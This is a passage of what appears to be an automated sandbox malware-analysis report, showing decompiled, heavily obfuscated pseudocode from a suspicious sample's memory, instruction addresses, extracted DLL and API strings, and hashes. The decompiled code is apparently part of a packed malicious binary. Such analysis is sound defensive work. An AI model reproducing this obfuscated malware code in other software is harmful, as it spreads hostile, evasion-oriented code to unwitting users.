							_t349 = 0xfc + _t234 + _t234;
						}
					}
					if((_t349 | 0x0000002d) >= 0x3d) {
						L42:
						 *0x65afd8 = _t234;
					} else {
						 *0x658164 = _t427;
						 *0x6581cc =  *0x6581cc + _t480;
						 *0x6581e6 =  *0x6581e6 + _t480;
						if((_t480 & 0x0098e828) >= 0) {
							goto L42;
						}
					}
					_t353 = 0xe5;
					 *0x658739 =  *0x658739 + _t490;
					 *(_t522 - 0x54) = _t480;
					 *(_t522 - 8) = _t234;
					_t235 = _t234 - 0x2f;
					 *(_t522 - 0x10) = _t427;
					 *0x65816c = 0x659e;
					_t510 = 0x8d0a;
					_push(_t480);
					if((_t480 & 0x0093b5a4) > 0) {
						L48:
						 *0x6596d9 =  *0x6596d9 + _t480;
						 *0x6581d6 = _t480;
						if(_t510 != 0) {
							_t510 = _t510 - 0xcd29;
							 *0x65ab6e =  *0x65ab6e - _t490;
						}
						 *0x65afdb = _t235;
					} else {
						_t243 =  *0x65afd5; // -53
						_t510 = 0xffffffffffffd0b1;
						if(0x8d0a == 0) {
							_t235 = _t243 + _t243;
							if(_t490 == 0) {
								_t490 =  !(_t490 - 1);
								_t235 = "GetProcessorSystemCycleTime";
								_t353 = 0x3fca69;
							}
							 *0x65afcd =  *0x65afcd + _t353;
							goto L48;
						}
					}
					_t237 =  *0x65839d; // 0x0
					 *0x6585fd =  *0x6585fd - _t237;
					 *0x658791 =  *0x658791 + _t237;
					_t239 =  *(_t522 - 8);
					_t432 =  *(_t522 - 0x10);
					_pop(_t484);
					_push( *(_t522 - 0x54));
					_push(_t484);
					if((_t484 & 0x00814e7b) < 0) {
						 *0x658713 =  *0x658713 - _t490;
						 *0x65acf2 =  *0x65acf2 + _t490;
					}
					 *(_t522 - 0x10) = _t432;
					 *(_t522 - 8) = _t239;
					 *(_t522 - 0xc) = _t239;
					_push(0x637c86);
					_push( &M00635874);
					return  *(_t522 - 8);
				}
			}

0x006376a9
0x006376c8
0x006376cf
0x006376d1
0x006376d9
0x006376e3
0x006376f2
0x006376f7
0x00637701
0x00637707
0x00637715
0x00637715
0x0063772e
0x00637731
0x00637736
0x0063773c
0x0063773f
0x00637747
0x00637777
0x00000000
0x00637749
0x00637749
0x0063774f
0x006377b8
0x00637751
0x00637751
0x00637759
0x0063775e
0x00637760
0x0063776b
0x0063776b
0x00637770
0x00000000
0x00637770
0x00637780
0x00637780
0x00637786
0x0063779b
0x006377a1
0x006377ab
0x006377b4
0x00000000
0x006377b6
0x006377b4
0x0063774f
0x006377c7
0x00637e9a
0x00637ea0
0x00637ea8
0x00637eb8
0x00637ecc
0x00637ece
0x00637ed0
0x00637ed4
0x00637ed9
0x00637edc
0x00637ee1
0x00637ee6
0x00637ee6
0x00637eaa
0x00637eb1
0x00000000
0x00000000
0x00637eb6
0x00000000
0x00637eb6
0x0063803f
0x00638047
0x0063804d
0x00638053
0x0063805a
0x0063805c
0x0063806c
0x00638075
0x00638075
0x0063807c
0x00638089
0x0063808f
0x00638097
0x00638099
0x00638099
0x0063809c
0x006380a2
0x006380ac
0x006380c0
0x006380c2
0x006380c7
0x006380ae
0x006380b4
0x006380be
0x00000000
0x00000000
0x006380be
0x006380dd
0x006380e5
0x006380f0
0x006380f7
0x006380f7
0x00638136
0x00638156
0x00638159
0x00638166
0x0063816c
0x00638171
0x00638180
0x0063818f
0x0063819b
0x0063819d
0x0063819d
0x0063819b
0x006381b4
0x006381be
0x006381c4
0x006382a1
0x006382a4
0x006382b2
0x006382b9
0x006382bc
0x006382c3
0x006382cb
0x006382cb
0x006382d2
0x006382d9
0x006382d9
0x006382e0
0x006382f0
0x006382f9
0x006382ff
0x00638301
0x00638301
0x0063830d
0x00638313
0x0063831a
0x0063831d
0x00638320
0x00638326
0x00638338
0x0063833f
0x00638342
0x00638349
0x0063834e
0x00638357
0x00638357
0x00638365
0x00638377
0x00638377
0x00638388
0x0063839c
0x0063839f
0x006383b0
0x006383cd
0x006383d2
0x006383db
0x006383ea
0x006383f5
0x006383f8
0x00638400
0x00638411
0x00638418
0x00638421
0x00638423
0x00638424
0x00638426
0x0063842b
0x00638430
0x006381ca
0x006381cf
0x006381d4
0x006381de
0x00000000
0x006381eb
0x006381de
0x006381fa
0x00638203
0x0063820b
0x00638212
0x00638219
0x0063822d
0x0063822d
0x0063822d
0x00638237
0x0063823e
0x00638242
0x00638247
0x0063825a
0x00638261
0x00638269
0x0063826b
0x00638272
0x00638278
0x0063828f
0x0063878d
0x0063878d
0x006377cd
0x006377d0
0x006377d6
0x006377dd
0x006377e8
0x006377fc
0x00637806
0x0063780f
0x0063781c
0x00637821
0x0063782a
0x00637858
0x0063785b
0x0063785d
0x0063785d
0x00637871
0x0063782c
0x00637836
0x0063784d
0x0063784f
0x00637855
0x00000000
0x00637855
0x0063784d
0x0063787b
0x00637881
0x00637887
0x0063788c
0x00637897
0x0063789a
0x0063789b
0x006378a0
0x006378a8
0x006378aa
0x006378aa
0x006378b4
0x006378c0
0x006378c8
0x006378cb
0x006378d3
0x006378ed
0x006378f0
0x0063790d
0x0063790e
0x0063791d
0x00637942
0x0063794c
0x00637957
0x00637958
0x00637962
0x0063796a
0x0063796c
0x0063796c
0x00637973
0x0063797a
0x00637980
0x00637991
0x006379a3
0x006379a4
0x006379aa
0x006379b4
0x006379b7
0x006379bf
0x006379bf
0x006379c4
0x006379cc
0x006379cf
0x006379d2
0x006379d6
0x006379dd
0x006379e0
0x006379e1
0x006379e4
0x006379e8
0x006379ea
0x006379ef
0x006379f4
0x006379f7
0x00637a02
0x00637a08
0x00637a0b
0x00637a12
0x00637a15
0x00637a19
0x00637a21
0x00637a24
0x00637a2c
0x00637a2e
0x00637a30
0x00637a36
0x00637a36
0x00637a41
0x00637a48
0x00637a4b
0x00637a51
0x00637a53
0x00637a5d
0x00637a60
0x00637a74
0x00637a84
0x00637a87
0x00637a8a
0x00637a8d
0x00637a97
0x00637a9e
0x00637aa1
0x00637aa4
0x00637aad
0x00637ade
0x00637ae1
0x00637af2
0x00637af4
0x00637afb
0x00637b02
0x00000000
0x00637aaf
0x00637aaf
0x00637ab9
0x00637ac5
0x00637acb
0x00637adb
0x00000000
0x00637adb
0x00637b08
0x00637b0a
0x00637b11
0x00637b11
0x00637ab9
0x00637b1a
0x00637b4a
0x00637b4a
0x00637b1c
0x00637b22
0x00637b31
0x00637b38
0x00637b48
0x00000000
0x00000000
0x00637b48
0x00637b58
0x00637b5a
0x00637b61
0x00637b64
0x00637b67
0x00637b69
0x00637b70
0x00637b80
0x00637b84
0x00637b8b
0x00637bc7
0x00637bcb
0x00637bd1
0x00637be6
0x00637be8
0x00637bed
0x00637bed
0x00637bf3
0x00637b8d
0x00637b8d
0x00637b93
0x00637b9b
0x00637b9d
0x00637ba2
0x00637ba5
0x00637bb3
0x00637bb7
0x00637bb7
0x00637bbc
0x00000000
0x00637bc2
0x00637b9b
0x00637bfe
0x00637c03
0x00637c09
0x00637c12
0x00637c15
0x00637c18
0x00637c19
0x00637c1f
0x00637c26
0x00637c37
0x00637c3e
0x00637c4d
0x00637c54
0x00637c5d
0x00637c68
0x00637c7b
0x00637c80
0x00637c85
0x00637c85

Strings

srcore.dll, xrefs: 006382D2
CreateDisc.dll, xrefs: 00637724, 0063788F, 006380E0
GetProcessorSystemCycleTime, xrefs: 00637BAE
NetMessageNameGetInfo, xrefs: 006381E1
GetThreadWaitChain, xrefs: 006377E3, 006378DB, 006379B7, 00637A7F
SMSvcHost.exe, xrefs: 00638360
_fltused, xrefs: 00638149
<, xrefs: 00637AC0
ehui.dll, xrefs: 00637C4D
CreateDisc.dll, xrefs: 006378FA
api-ms-win-core-errorhandling-l1-1-0.dll, xrefs: 006378C3
GetDlgItem, xrefs: 00638062, 006381B7
sbeio.dll, xrefs: 006381A8
Heap32ListNext, xrefs: 00638112
}M), xrefs: 0063781C

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: CreateDisc.dll$CreateDisc.dll$GetDlgItem$GetProcessorSystemCycleTime$GetThreadWaitChain$Heap32ListNext$NetMessageNameGetInfo$SMSvcHost.exe$_fltused$api-ms-win-core-errorhandling-l1-1-0.dll$ehui.dll$sbeio.dll$srcore.dll$}M)$<
API String ID: 0-1848004757
Opcode ID: 6f86ec9066cdc995232e6106c43f4506179f9620c13a8dd9aaf73f73b3175b9b
Instruction ID: 98cf317bdbf015f3f5dc17067b02fefc5409bd0f20794a51f2744a92a6aaa4ea
Opcode Fuzzy Hash: 6f86ec9066cdc995232e6106c43f4506179f9620c13a8dd9aaf73f73b3175b9b
Instruction Fuzzy Hash: F742E0B5E047068FCB10DFB9E8902DD7BB3FB29321F04526AD855A7B61E7340A41CB95

Uniqueness

Uniqueness Score: -1.00%

Function 006234F1 Relevance: 20.4, Strings: 16, Instructions: 450
COMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			E006234F1(char* __eax, unsigned int __ebx, signed int __ecx, short __edx, signed int __edi, signed int __esi) {
				char* _t79;
				char* _t80;
				char* _t83;
				char* _t87;
				char* _t89;
				char* _t91;
				char _t92;
				char* _t97;
				char* _t98;
				char* _t109;
				char* _t113;
				char* _t115;
				char* _t122;
				char* _t130;
				signed int _t131;
				signed int _t149;
				intOrPtr _t156;
				char* _t162;
				signed int _t184;
				char* _t194;
				intOrPtr _t236;
				signed char _t238;
				intOrPtr _t241;
				void* _t243;
				signed char _t245;
				signed short _t258;
				short _t264;
				signed char _t265;
				void* _t273;
				intOrPtr _t285;
				signed int _t286;
				signed char _t287;
				short _t291;
				intOrPtr _t296;
				void* _t297;
				signed int _t300;
				signed int _t306;
				signed short _t307;
				unsigned short _t309;
				void* _t313;

				_t306 = __esi;
				_t300 = __edi;
				_t274 = __edx;
				 *(_t313 - 8) = __eax;
				_t79 =  *(_t313 - 8);
				 *((intOrPtr*)(_t313 - 0xc)) =  *((intOrPtr*)(_t313 - 0xc)) + (__ebx >> __ecx) + 0x406706;
				 *0x65afce =  *0x65afce - __ecx;
				_t236 =  *0x658170; // 0x9b6f
				 *(_t313 - 0x20) = _t79;
				if(__edi >= 0) {
					 *0x65850d = _t79;
				}
				 *(_t313 - 8) = _t79;
				_t122 = 0x3c2461;
				_t80 =  *(_t313 - 8);
				if(0x3c2461 <= 0x3c2461) {
					_t273 = _t236 - 0x6a7a + 1;
					 *0x658196 =  *0x658196 - _t273;
					_t274 = _t274 + 1;
					 *0x65afd6 = _t80;
					 *0x65afda = _t80;
					_t300 = _t300 + 0xf084;
					 *0x65afc7 =  *0x65afc7 - _t80;
					 *0x65868d = _t80;
					_t122 = 0;
					_t236 = _t273 + 0x5bc1;
				}
				 *(_t313 - 8) = _t80;
				if(_t80 != 0x2e) {
					_t122 = "api-ms-win-core-processthreads-l1-1-0.dll";
					_t236 = 0x5a4d28;
				}
				_t238 =  !(_t236 - 0x6871ad);
				 *0x6581d2 = _t274;
				_t83 =  *(_t313 - 8);
				if( *(_t313 - 0x20) == 0) {
					 *(_t313 - 8) = _t122;
					__eflags =  *(_t313 - 0x2050) - 0x100000;
					if( *(_t313 - 0x2050) <= 0x100000) {
						 *(_t313 - 8) = _t83;
						_t241 =  *0x65813c; // 0x5d6c
						 *0x65813e =  *0x65813e + _t241;
						_t243 = _t241 + _t241 + 0x77b6;
						 *0x6581da = _t274;
						_t130 = "GetThreadWaitChain";
						 *0x6580f2 =  *0x6580f2 + _t130;
						_t131 = _t130 - _t243;
						_t245 = _t243 + 0x00571745 | 0x00000073;
						_t87 =  *(_t313 - 8);
						__eflags =  *(_t313 - 0x2050);
						if( *(_t313 - 0x2050) > 0) {
							_t307 = 0;
							__eflags = _t300;
							if(_t300 < 0) {
								 *0x65afdc = _t87;
								_t131 =  &(( &(_t87[_t87]))[1]);
								__eflags = _t131;
							}
							__eflags = _t131 - _t131;
							if(_t131 == _t131) {
								_t245 = 0x72f6;
								 *0x659785 =  *0x659785 - 0x72f6;
								_t274 = 0xffffffffff6e76eb;
								 *0x65afd5 =  *0x65afd5 - _t87;
								__eflags = _t307 & 0x0000b9ec;
								if((_t307 & 0x0000b9ec) < 0) {
									 *0x65aae6 =  *0x65aae6 + _t300;
									__eflags =  *0x65aae6;
									_t131 =  *0x65afdc; // -49
								}
								 *0x658445 =  *0x658445 - _t300;
								__eflags =  *0x658445;
							}
							_t156 =  *((intOrPtr*)(_t313 - 0xc));
							_push( *(_t313 - 0x2050));
							_t258 = (_t245 >> _t245) + 0x61e904 - 1;
							__eflags = _t258 & 0x000084d2;
							if((_t258 & 0x000084d2) != 0) {
								 *0x6581d4 = _t274;
								 *0x65afd6 = _t87;
								 *0x65afd6 = _t87;
								_t156 = _t156 - _t87;
								_t307 = _t307 - 0xd3aa;
								__eflags = _t307;
							}
							 *(_t313 - 8) = _t87;
							_t97 =  *(_t313 - 8);
							 *(_t313 - 8) = _t156 - 0x38;
							_push( *((intOrPtr*)(_t313 - 0x2054)));
							_t245 =  *0x658188; // 0x2f10
							_t274 = 0x86e9;
							__eflags = 0x86c9;
							if(0x86c9 >= 0) {
								_t274 = 0x10e83;
								 *0x65afd6 =  &(( *0x65afd6)[_t97]);
								__eflags = _t307;
								if(_t307 >= 0) {
									__eflags = _t307;
									if(_t307 < 0) {
									}
									 *0x65adee =  *0x65adee + _t300;
									__eflags =  *0x65adee;
								}
							}
							 *0x658052 =  *0x658052 + _t97;
							_push( *((intOrPtr*)(_t313 - 0x2070)));
							_t98 = E00620418(_t97, _t97, _t274, _t300, _t307);
							_t306 = _t307 - 0xb06c;
							 *(_t313 - 8) = _t98;
							_t162 = "RtlIpv4StringToAddressW";
							__eflags = _t162 - 0x4421;
							if(_t162 >= 0x4421) {
								L43:
								 *0x65ae9e =  *0x65ae9e + _t300;
								_t98 = 0;
								__eflags = 0;
							} else {
								_t245 = 0x658177;
								__eflags = 0x658116 - 0x658116;
								if(0x658116 >= 0x658116) {
									_t245 =  *0x6581b2; // 0x8e63
									_t274 = (0x92f9 >> _t245) + (0x92f9 >> _t245);
									__eflags = _t306;
									goto L43;
								}
							}
							_t87 =  *(_t313 - 8);
							__eflags = _t87 - 1;
							if (_t87 != 1) goto L45;
						}
						 *((intOrPtr*)(_t313 - 0x10)) =  *((intOrPtr*)(_t313 - 0x10)) - _t245;
						 *(_t313 - 8) = _t87;
						 *0x658150 = _t274;
						_t89 =  *(_t313 - 8);
						 *0x6581a4 =  *0x6581a4 + 0x93ec;
						_push( *((intOrPtr*)(_t313 - 0x204c)));
						 *(_t313 - 8) = _t89;
						 *(_t313 - 8) = _t89;
						 *0x65afcc =  *0x65afcc + 0x347ef7;
						_t91 =  *(_t313 - 8);
						_t149 = "api-ms-win-core-errorhandling-l1-1-0.dll" - _t91;
						 *(_t313 - 8) = _t91;
						_t92 = _t91 - 0x2cda;
						__eflags = _t149 - 0x365eb5;
						if(_t149 < 0x365eb5) {
							 *0x658e29 = _t149;
							 *0x65819a = 0xffffffffffa64600;
							__eflags = 0x260200;
							if(0x260200 < 0) {
								__eflags = 0x9482;
								 *0x658222 = 0x9482;
								_t92 = 0xc6;
							}
							 *0x65afd9 = _t92;
							__eflags = _t300 + _t300;
							if(_t300 + _t300 >= 0) {
							}
							_t149 = 0;
							__eflags = 0;
						}
						__eflags = _t149 + 0x4c855b;
						_push(0x628899);
						_push( &M005F8C55);
						return  *(_t313 - 8);
					} else {
						 *0x65afc6 = _t83;
						 *(_t313 - 8) = 0x284baa;
						 *(_t313 - 8) = _t83;
						 *0x658d49 = 0x313daa;
						E006054B4(L005B508F(0x627b54, 0x3b3dd, 0x65ad46, _t306), 0x627b54, 0x3b3dd, _t274, 0x65ad46, _t306, 0x658178, 1, 1);
						 *0x65816e = 0x3b3dd;
						_t109 =  *(_t313 - 8);
						_t184 = 0x627b54 + _t109;
						__eflags = _t184;
						 *(_t313 - 8) = _t109;
						_push(_t184);
						_push(E00626319);
						_push(L00605AC1);
						return _t109;
					}
				} else {
					 *0x65a57f =  *0x65a57f - _t306;
					 *(_t313 - 8) = _t83;
					 *0x658de5 = "Heap32ListNext";
					_t110 =  *(_t313 - 8);
					 *0x65817c = _t238;
					_t285 =  *0x6581b0; // 0x13ea
					 *0x6599d9 =  *0x6599d9 - _t285;
					 *0x659b0d =  *0x659b0d + _t285;
					_t286 = _t285 + _t285;
					_t309 = _t306 + 0xb157 >> _t238;
					_t191 = 0xec;
					if(0xec > 0x2d) {
						_t191 = 0x441011;
						_t238 = 0xffffffffffff9493;
					}
					 *0x6581cc = _t286;
					E0060162A(_t110, _t191, _t238, _t286, _t300, 0xffffffffffff9493, 1);
					_t287 = _t286 | 0x0098eb2c;
					_t264 = 0;
					_push(0);
					_t194 = 0x4f;
					_t113 =  *(_t313 - 8);
					 *0x658138 = 0;
					if(0 >= 0) {
						_t264 = 0x7d49;
						 *0x6597e9 =  *0x6597e9 + _t287;
						_t287 = _t287 - 0xa7;
						 *0x65afd6 = _t113;
						if(_t300 > 0) {
							 *0x658727 =  *0x658727 - _t300;
						}
						_t194 =  &(_t113[_t113]);
					}
					if(_t194 + 0x40 == _t194 + 0x40) {
						_t264 =  *0x65813c; // 0x5d6c
						 *0x6581a2 = _t287;
						_t296 =  *0x6581d6; // 0x8637
						_t297 = _t296 - 0x95fb;
						 *0x65820c =  *0x65820c + _t297;
						_t287 = _t297 + _t297;
						_t309 = _t309 + 0xb0f190;
					}
					 *0x65aa3e =  *0x65aa3e + _t309;
					_push(0);
					 *0x65acca =  *0x65acca - _t300;
					 *0x65afdb =  *0x65afdb + _t113;
					if(_t113 < 0x19eb) {
						 *0x6588e9 = _t113;
						 *0x6580f2 =  *0x6580f2 + 0x3a9ae9;
						_t264 = 0x6a;
						 *0x65afd0 =  *0x65afd0 - 0x6a;
						if((_t287 & 0x00000082) <= 0) {
							 *0x658361 =  *0x658361 - 0xba144c;
							 *0x65afda =  &(( *0x65afda)[_t113]);
							if(0 >= 0) {
							}
							 *0x65864d = _t113;
						}
					}
					_push(5);
					 *(_t313 - 8) = _t113;
					 *(_t313 - 8) = 0xffffffffffd0b9fe;
					_push(0);
					 *((intOrPtr*)(_t313 - 0xc)) = 0x4691;
					_t265 = _t264 + _t264;
					_t115 =  *(_t313 - 8);
					 *0x6581a2 = _t265;
					 *(_t313 - 8) = _t115;
					if("_fltused" + "_fltused" >= "_fltused" + "_fltused") {
						 *0x658154 = _t265;
					}
					_t291 =  *0x6581a4; // 0x8003
					 *0x6581f4 = _t291;
					_push(0);
					_push(0x6237fd);
					_push(L0061D968);
					return _t115;
				}
			}

0x006234f1
0x006234f1
0x006234f1
0x006234f1
0x006234f7
0x00623500
0x00623503
0x00623509
0x00623510
0x00623515
0x00623517
0x00623517
0x00623521
0x00623526
0x0062352b
0x00623531
0x0062353b
0x0062353c
0x00623548
0x00623549
0x00623553
0x00623558
0x0062355f
0x00623565
0x00623579
0x0062357b
0x0062357b
0x00623580
0x00623585
0x0062358d
0x00623594
0x00623594
0x006235a3
0x006235a5
0x006235b4
0x006235bb
0x00626276
0x0062628c
0x00626296
0x00628582
0x00628594
0x006285ab
0x006285b8
0x006285bd
0x006285cc
0x006285d1
0x006285d8
0x006285e1
0x006285e4
0x006285e7
0x006285ee
0x006285f4
0x006285f6
0x006285f8
0x006285fa
0x0062860f
0x0062860f
0x0062860f
0x00628610
0x00628613
0x0062861f
0x00628623
0x0062862c
0x00628632
0x00628638
0x0062863d
0x00628643
0x00628643
0x0062864b
0x0062864b
0x00628651
0x00628651
0x00628651
0x00628668
0x0062866b
0x0062867a
0x0062867b
0x00628680
0x00628682
0x00628694
0x0062869a
0x006286a0
0x006286a2
0x006286a2
0x006286a2
0x006286a7
0x006286ad
0x006286b0
0x006286b3
0x006286bb
0x006286c2
0x006286c6
0x006286cb
0x006286d3
0x006286d6
0x006286dc
0x006286de
0x006286e0
0x006286e3
0x006286e3
0x006286e7
0x006286e7
0x006286e7
0x006286de
0x006286f6
0x00628700
0x00628708
0x0062870d
0x00628712
0x00628715
0x0062871a
0x0062871f
0x0062874e
0x00628756
0x0062875e
0x0062875e
0x00628723
0x00628729
0x0062872c
0x0062872e
0x00628733
0x00628741
0x00628749
0x00000000
0x0062874c
0x0062872e
0x00628773
0x00628776
0x00628779
0x00628779
0x0062877b
0x00628785
0x00628793
0x006287c7
0x006287ca
0x006287d1
0x006287e4
0x006287e7
0x006287ef
0x0062881b
0x00628823
0x00628825
0x00628828
0x0062882c
0x00628832
0x00628834
0x00628843
0x0062884a
0x00628850
0x00628852
0x00628855
0x00628861
0x00628861
0x00628863
0x0062886c
0x0062886f
0x0062886f
0x00628882
0x00628882
0x00628882
0x00628885
0x0062888e
0x00628893
0x00628898
0x0062629c
0x006262a4
0x006262b5
0x006262ba
0x006262e0
0x006262f2
0x006262f7
0x00626305
0x00626308
0x00626308
0x0062630a
0x0062630d
0x0062630e
0x00626313
0x00626318
0x00626318
0x006235c1
0x006235c3
0x006235c9
0x006235d1
0x006235da
0x006235dd
0x006235e7
0x006235ee
0x006235f4
0x006235fa
0x00623604
0x0062360f
0x00623617
0x0062361c
0x00623629
0x00623629
0x0062362e
0x00623637
0x0062363c
0x00623645
0x00623647
0x0062364f
0x00623652
0x00623655
0x0062365f
0x00623663
0x00623667
0x00623673
0x00623678
0x00623688
0x0062368a
0x00623693
0x006236a5
0x006236a5
0x006236ad
0x006236b1
0x006236b8
0x006236bf
0x006236c6
0x006236cb
0x006236d2
0x006236d7
0x006236d7
0x006236dd
0x006236e9
0x006236f0
0x006236f6
0x00623708
0x0062370a
0x00623716
0x00623723
0x00623726
0x0062372f
0x0062374b
0x00623752
0x0062375d
0x0062375d
0x00623760
0x00623760
0x0062376d
0x0062377e
0x00623788
0x00623794
0x00623799
0x006237ac
0x006237af
0x006237b2
0x006237b5
0x006237bf
0x006237cb
0x006237cd
0x006237d4
0x006237db
0x006237e2
0x006237f0
0x006237f2
0x006237f7
0x006237fc
0x006237fc

Strings

srcore.dll, xrefs: 0062627C, 0062880D
GetThreadWaitChain, xrefs: 006285CC
SMSvcHost.exe, xrefs: 00623621
a$<, xrefs: 00623526
_fltused, xrefs: 006237C2, 00628788
ehui.dll, xrefs: 006287DF
RtlIpv4StringToAddressW, xrefs: 00623571, 00628715
api-ms-win-core-errorhandling-l1-1-0.dll, xrefs: 0062881E
Heap32ListNext, xrefs: 006235CC
Pr>, xrefs: 006262C2
hpz3lw71.dll, xrefs: 0062369E
IEShims.dll, xrefs: 00628606
api-ms-win-core-processthreads-l1-1-0.dll, xrefs: 0062358D, 006262C7
LdrHotPatchRoutine, xrefs: 0062376D
d3d10core.dll, xrefs: 0062858D, 006287B3
VarFormatDateTime, xrefs: 00628661

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: GetThreadWaitChain$Heap32ListNext$IEShims.dll$LdrHotPatchRoutine$Pr>$RtlIpv4StringToAddressW$SMSvcHost.exe$VarFormatDateTime$_fltused$a$<$api-ms-win-core-errorhandling-l1-1-0.dll$api-ms-win-core-processthreads-l1-1-0.dll$d3d10core.dll$ehui.dll$hpz3lw71.dll$srcore.dll
API String ID: 0-766743067
Opcode ID: 9961469ba0ec407d2f2847d951fe794e12bc2b40bf0fb7e97f577020e8cc3844
Instruction ID: dbb1bafe5f41b8174158e2c32989aa5801370ec621a4b32f1a9127f7cb542ddf
Opcode Fuzzy Hash: 9961469ba0ec407d2f2847d951fe794e12bc2b40bf0fb7e97f577020e8cc3844
Instruction Fuzzy Hash: 54F12375B507069FCB00EFB8EC946C97BB3EB29321F08526EC945A7B62E7740A45CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00626319 Relevance: 16.6, Strings: 13, Instructions: 381
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00626319(signed int __eax, void* __ecx, short __edx, void* __edi, signed int __esi) {
				signed int _t75;
				signed int _t80;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed int _t90;
				signed int _t91;
				signed int _t99;
				signed int _t102;
				unsigned int _t108;
				intOrPtr _t111;
				char* _t119;
				unsigned int _t120;
				signed char _t138;
				intOrPtr _t145;
				intOrPtr _t165;
				void* _t182;
				intOrPtr _t195;
				intOrPtr _t196;
				void* _t198;
				signed char _t200;
				signed char _t219;
				signed char _t221;
				short _t227;
				signed int _t240;
				signed int _t241;
				void* _t245;
				signed int _t248;
				signed short _t249;
				void* _t251;
				unsigned short _t252;
				void* _t254;

				_t248 = __esi;
				_t245 = __edi;
				_t227 = __edx;
				_t75 = __eax;
				_t111 =  *0x658d71; // 0x367874
				if(_t111 <= _t111) {
					 *0x658120 =  *0x658120 - __ecx;
				}
				_t195 =  *0x658170; // 0x9b6f
				 *0x6581bc = _t227;
				_t230 = 0x9f23;
				 *0x65afd6 = _t75;
				_t76 =  *(_t254 - 8);
				if( *((intOrPtr*)(_t254 - 0x2050)) >= 0xa00000) {
					 *(_t254 - 8) = _t76;
					_t196 =  *0x65813c; // 0x5d6c
					 *0x65813e =  *0x65813e + _t196;
					_t198 = _t196 + _t196 + 0x77b6;
					 *0x6581da = 0x9e72;
					_t119 = "GetThreadWaitChain";
					 *0x6580f2 =  *0x6580f2 + _t119;
					_t120 = _t119 - _t198;
					_t200 = _t198 + 0x00571745 | 0x00000073;
					_t80 =  *(_t254 - 8);
					if( *((intOrPtr*)(_t254 - 0x2050)) <= 0) {
						L49:
						 *((intOrPtr*)(_t254 - 0x10)) =  *((intOrPtr*)(_t254 - 0x10)) - _t200;
						 *(_t254 - 8) = _t80;
						 *0x658150 = _t230;
						_t82 =  *(_t254 - 8);
						 *0x6581a4 =  *0x6581a4 + 0x93ec;
						_push( *((intOrPtr*)(_t254 - 0x204c)));
						 *(_t254 - 8) = _t82;
						 *(_t254 - 8) = _t82;
						 *0x65afcc =  *0x65afcc + 0x347ef7;
						_t84 =  *(_t254 - 8);
						_t138 = "api-ms-win-core-errorhandling-l1-1-0.dll" - _t84;
						 *(_t254 - 8) = _t84;
						_t85 = _t84 - 0x2cda;
						if(_t138 < 0x365eb5) {
							 *0x658e29 = _t138;
							 *0x65819a = 0xffffffffffa64600;
							if(0x260200 < 0) {
								 *0x658222 = 0x9482;
								_t85 = 0xc6;
							}
							 *0x65afd9 = _t85;
							if(_t245 + _t245 >= 0) {
							}
							_t138 = 0;
						}
						_push(0x628899);
						_push( &M005F8C55);
						return  *(_t254 - 8);
					}
					_t249 = 0;
					if(_t245 < 0) {
						 *0x65afdc = _t80;
						_t120 = _t80 + _t80 + 1;
					}
					if(_t120 == _t120) {
						_t200 = 0x72f6;
						 *0x659785 =  *0x659785 - 0x72f6;
						_t230 = 0xffffffffff6e76eb;
						 *0x65afd5 =  *0x65afd5 - _t80;
						if((_t249 & 0x0000b9ec) < 0) {
							 *0x65aae6 =  *0x65aae6 + _t245;
							_t120 =  *0x65afdc; // -49
						}
						 *0x658445 =  *0x658445 - _t245;
					}
					_t145 =  *((intOrPtr*)(_t254 - 0xc));
					_push( *((intOrPtr*)(_t254 - 0x2050)));
					if(((_t200 >> _t200) + 0x0061e904 - 0x00000001 & 0x000084d2) != 0) {
						 *0x6581d4 = _t230;
						 *0x65afd6 = _t80;
						 *0x65afd6 = _t80;
						_t145 = _t145 - _t80;
						_t249 = _t249 - 0xd3aa;
					}
					 *(_t254 - 8) = _t80;
					_t90 =  *(_t254 - 8);
					 *(_t254 - 8) = _t145 - 0x38;
					_push( *((intOrPtr*)(_t254 - 0x2054)));
					_t200 =  *0x658188; // 0x2f10
					_t230 = 0x86e9;
					if(0x86c9 >= 0) {
						_t230 = 0x10e83;
						 *0x65afd6 =  *0x65afd6 + _t90;
						if(_t249 >= 0) {
							if(_t249 < 0) {
							}
							 *0x65adee =  *0x65adee + _t245;
						}
					}
					 *0x658052 =  *0x658052 + _t90;
					_push( *((intOrPtr*)(_t254 - 0x2070)));
					_t91 = E00620418(_t90, _t90, _t230, _t245, _t249);
					_t248 = _t249 - 0xb06c;
					 *(_t254 - 8) = _t91;
					if("RtlIpv4StringToAddressW" >= 0x4421) {
						L47:
						 *0x65ae9e =  *0x65ae9e + _t245;
						_t91 = 0;
						goto L48;
					} else {
						_t200 = 0x658177;
						if(0x658116 < 0x658116) {
							L48:
							_t80 =  *(_t254 - 8);
							if (_t80 != 1) goto L49;
							goto L49;
						}
						_t200 =  *0x6581b2; // 0x8e63
						_t230 = (0x92f9 >> _t200) + (0x92f9 >> _t200);
						_t248 = _t248 >> _t200;
						goto L47;
					}
				}
				if(_t245 < 0) {
					L5:
					 *(_t254 - 8) = _t76;
					L6:
					_t165 =  *((intOrPtr*)(_t254 - 0xc));
					 *0x65afcd =  *0x65afcd - _t165;
					 *0x65813e =  *0x65813e + _t195;
					 *0x6581da = _t230;
					_t99 = _t254 - 0x205c;
					_t219 = _t230;
					_t240 =  *0x6581de; // 0x0
					 *0x658230 = _t248;
					_t251 = _t248 + _t248 + 0xb2bc57;
					 *(_t254 - 8) = _t99;
					 *0x658c9d = _t165;
					if(_t165 > _t165) {
						if(_t165 <= _t165) {
							 *0x65afce =  *0x65afce + _t219;
						}
						 *0x658160 = _t219;
						_t219 =  *0x658192; // 0x95c4
						_t240 = 0x8941;
					}
					if((_t240 & 0x00009124) == 0) {
						if((_t240 & 0x009050eb) <= 0) {
							_t251 = _t251 + 0xb0ae;
						}
						 *0x65afd6 =  *0x65afd6 - _t99;
						_t251 = _t251;
					}
